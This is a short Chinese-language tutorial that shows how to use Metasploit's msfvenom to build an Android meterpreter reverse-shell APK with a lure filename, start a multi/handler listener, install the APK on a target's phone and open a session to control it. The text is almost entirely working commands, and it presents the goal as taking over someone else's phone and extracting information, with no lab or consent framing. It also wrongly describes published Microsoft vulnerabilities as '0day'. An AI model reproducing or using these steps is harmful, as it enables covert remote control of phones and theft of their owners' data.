MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。
1.查看ip
ifconfig
2.生成木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribenav.apk
3.然后进入Msf,启动msfconsole
- 命令:
msfconsole
4.然后执行以下命令
- 命令:
use exploit/multi/handler//加载模块 - 命令:
set payload android/meterpreter/reverse_tcp//选择Payload - 命令:
set LHOST 192.168.0.109//ip为kaili的ip ,即刚才生成木马的ip - 命令:
set LPORT 44444//端口一定要与前面生成的木马的端口一致
5.将木马apk安装到目标手机上,然后输入以下命令
- 命令:
exploit//开始执行漏洞,开始监听,等待手机上线
6.我们会发现有一个ID和本机处于连接状态,下面开始和ID为1的目标建立会话。
sessions 1
7.这样对方的手机就就被我们控制了,之后便可以执行命令,获得想要的信息。可以输入help查看有哪些命令
